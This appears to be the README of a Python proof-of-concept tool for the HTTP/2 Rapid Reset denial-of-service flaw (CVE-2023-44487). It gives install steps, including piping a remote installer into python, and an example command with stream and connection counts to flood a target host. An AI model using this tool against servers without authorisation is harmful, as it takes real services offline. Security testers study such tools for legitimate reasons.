A python based exploit to test out rapid reset attack (CVE-2023-44487)# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
# Exploit:
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
## Table of Contents
- [Installation](#installation)
- [Usage](#usage)
## Installation
Clone the repository to your local machine using Git, install poetry, and run the program:
```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git
cd CVE-2023-44487
# install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -
# poetry install
poetry install
# Activate the virtual environment created by Poetry:
poetry shell
# Run Help
python main.py
## Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2
```
## Usage
Usage: main.py [OPTIONS]
```bash
Options:
--host TEXT Host URL [required]
--path TEXT Path on the host [required]
--headers TEXT Headers (comma-separated) [required]
--port INTEGER Port number [required]
--requests_count INTEGER Number of requests to be sent [required]
--max_streams INTEGER Maximum streams to be opened in parallel
[required]
--parallel_connections INTEGER Number of parallel connections to be made
with the server. (TCP connection)
[required]
--help Show this message and exit.
```
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view